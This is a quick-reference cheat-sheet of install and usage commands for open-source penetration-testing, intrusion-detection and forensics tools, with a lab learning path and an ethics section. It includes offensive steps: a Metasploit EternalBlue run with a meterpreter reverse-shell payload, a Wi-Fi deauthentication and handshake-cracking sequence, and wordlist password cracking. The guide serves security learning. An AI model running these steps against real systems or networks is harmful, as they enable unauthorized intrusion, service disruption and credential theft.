Open-source pentest & forensics cheat-sheet (basic commands + quick guide)

 

Open-source pentest & forensics cheat-sheet (basic commands + quick guide)

🟠 Nmap — network discovery & port scanning

Install (Debian/Ubuntu): sudo apt install nmap
Basic scans:

• Host discovery (ping scan): nmap -sn 192.168.1.0/24

• Default ports + service/OS detection: nmap -A 192.168.1.10

• TCP SYN (fast stealth) full port sweep: nmap -sS -p- 10.0.0.5

• Scan specific ports: nmap -p22,80,443 10.0.0.5

• Aggressive timing: nmap -T4 -A target.com
  Quick guide: start with -sn to find live hosts, then targeted -sS with -A for services/versions. Export results: nmap -oN results.txt target
  Tip: Combine with -oX for XML output parsed by other tools.

🟠 Wireshark / tshark — packet capture & analysis

Install: sudo apt install wireshark
CLI capture with tshark:

• Capture on interface: sudo tshark -i eth0 -w capture.pcap

• Read file: tshark -r capture.pcap
  Wireshark GUI: open capture.pcap, apply display filters like http, ip.addr==192.168.1.5, or tcp.port==80.
  Quick guide: capture short sessions, then filter (display filters) to isolate protocols or conversations. Save only relevant packets with export options.
  Tip: use tshark -Y "http && ip.addr==x.x.x.x" to capture filtered traffic live.

🟠 Metasploit Framework (msfconsole)

Install (Kali preinstalled): sudo apt install metasploit-framework
Basic usage:

1. Start console: msfconsole

2. Search exploit: search smb

3. Use exploit: use exploit/windows/smb/ms17_010_eternalblue

4. Set options: set RHOSTS 10.0.0.5 set LHOST 10.0.0.10

5. Set payload: set PAYLOAD windows/meterpreter/reverse_tcp

6. Run: exploit or run
   Quick guide: reconnaissance → select exploit → configure payload → launch in controlled lab only.
   Tip: use db_nmap inside msfconsole to import scan results.

🟠 Snort (or Suricata) — IDS/IPS

Install (Snort example): sudo apt install snort
Basic run (Snort):

• Test: snort -T -c /etc/snort/snort.conf

• Run in console: sudo snort -c /etc/snort/snort.conf -i eth0 -A console
  Suricata install: sudo apt install suricata
  Run (Suricata): sudo suricata -c /etc/suricata/suricata.yaml -i eth0
  Quick guide: configure rules (EmergingThreats/ET), tune false positives, forward alerts to SIEM.
  Tip: run in IDS mode first before enabling inline IPS blocking.

🟠 OpenVAS / Greenbone (vulnerability scanner)

Install (common flow): on Debian/Ubuntu sudo apt install gvm or use distribution packages. Many installs use gvm-setup / gvm-start.
Basic workflow:

1. Start GVM/Greenbone services (depends on distro).

2. Open web UI (usually https://localhost:9392) and login.

3. Create target → create scan task → run scan → view report.
   Quick guide: update feeds before scanning, run credentialed scans (SSH/WMI) for deeper results.
   Tip: export reports to PDF/CSV for remediation tickets.

🟠 OSSEC — host-based IDS (HIDS)

Install: sudo apt install ossec-hids or use the official installer ./install.sh.
Basic commands:

• Start/stop: sudo /var/ossec/bin/ossec-control start|stop|restart

• View logs: /var/ossec/logs/
  Quick guide: install agent on endpoints, central server collects and alerts on log rules, integrity checks.
  Tip: write custom rules for application logs you care about.

🟠 Aircrack-ng — Wi-Fi auditing

Install: sudo apt install aircrack-ng
Typical workflow (monitor mode):

1. Put card into monitor mode: sudo airmon-ng start wlan0 → creates wlan0mon

2. Capture beacons/handshakes: sudo airodump-ng wlan0mon

3. Target BSSID channel: sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

4. Deauth to force handshake: sudo aireplay-ng --deauth 5 -a AA:BB:... wlan0mon

5. Crack handshake: aircrack-ng -w wordlist.txt capture-01.cap
   Quick guide: use only on networks you own or have permission to test. Use strong wordlists / rules for cracking.
   Tip: use hcxdumptool + hashcat for modern WPA/WPA2 cracking workflows.

🟠 Kali Linux — pentest platform

Get: download ISO from official Kali site, install or run live VM.
Quick guide: Kali is a toolbox — don’t run as daily desktop user. Use snapshots in VMs and practice in labs. Common tools already installed (Nmap, Metasploit, Aircrack, etc.).
Tip: update: sudo apt update && sudo apt full-upgrade (careful on custom setups).

🟠 John the Ripper — password cracking

Install: sudo apt install john
Basic commands:

• Show hash format: john --list=formats

• Single crack (wordlist): john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

• Resume: john --restore

• Show cracked: john --show hashes.txt
  Quick guide: identify hash type, choose correct mode (wordlist, incremental, rules).
  Tip: use john --rules to mutate wordlists.

🟠 Ghidra — reverse engineering

Get & run: download and extract, then ./ghidraRun (or runghidra.sh) from the Ghidra folder.
Basic workflow: File → New Project → Import binary → Auto-analysis → use decompiler + function graph.
Quick guide: annotate functions, rename symbols, create scripts in Python/Java for automation.
Tip: compare output with IDA/others; use Ghidra headless analyzer for batch tasks.

🟠 ClamAV — antivirus

Install: sudo apt install clamav clamav-daemon
Update DB: sudo freshclam
Scan: clamscan -r /home/user or clamscan -r --infected /var/www
Daemon: sudo systemctl start clamav-daemon
Quick guide: schedule scans with cron, update signatures frequently.
Tip: use --infected to list only infected files and --remove carefully.

🟠 The Sleuth Kit (TSK) — disk forensics

Install: sudo apt install sleuthkit
Common tools:

mmls image.dd — show partition layout
fls -r -m / image.dd — list files and dirs (with inode numbers)
icat image.dd inode > file — extract a file by inode

• tsk_recover image.dd output_dir — recover deleted files
• Quick guide: always work on a forensic image (dd or E01), not live disks.
• Tip: preserve hashes (md5/sha256) of image before analysis.

🟠 Yara — pattern matching for malware

Install: sudo apt install yara
Basic use: yara rulefile.yar suspect.bin
Rule example (very short):

rule ExampleRule {
  strings:
    $a = "malicious_string"
  condition:
    $a
}

Quick guide: create modular rules, test on corpuses, integrate into pipeline for scanning files.
Tip: use -r to recursively scan directories.

🟠 OWASP ZAP — web app scanning

Install: sudo apt install zaproxy (or use GUI)
Start in daemon (headless) mode: zap.sh -daemon -port 8080
Basic flows: spider → active scan → review alerts. Use the GUI for manual fuzzing.
Quick guide: proxy your browser through ZAP for passive scanning, then run active scanner against test targets.
Tip: use the API to automate scans from CI pipelines.

🟠 Bro (Zeek) — network analysis

Install: sudo apt install zeek (may be bro on some distros)
Basic run: sudo zeekctl deploy (after configuring) or capture single interface: zeek -i eth0 local
Command to run script: zeek -r capture.pcap
Quick guide: Zeek produces logs (conn.log, http.log) for analysis; write scripts for custom detection.
Tip: feed Zeek logs to Elastic/Graylog or SIEM for searching and alerting.

✅ Short learning path & practice labs

1. Set up a lab: VirtualBox/VMware with Kali + vulnerable VM (Metasploitable, OWASP Juice Shop).
2. Practice workflow: Recon (Nmap) → Enumeration (service scans, banner grabbing) → Exploitation (Metasploit/manual) → Post-exploit (meterpreter) → Cleanup & reporting.
3. Forensics workflow: Create disk image → analyze with TSK/Wireshark/Ghidra → document findings.
4. IDS/Monitoring: Deploy Suricata/Zeek + visualize logs in ELK or Splunk trial.
5. Wireless: Use Aircrack suite on a dedicated Wi-Fi adapter; always have permission.

⚠️ Ethics & safety (very important)

• Only test networks/devices you own or have explicit permission to test.
• Keep logs, evidence, and scope in writing (authorization) for every engagement.
• Never use these tools for illegal access, theft, or disruption.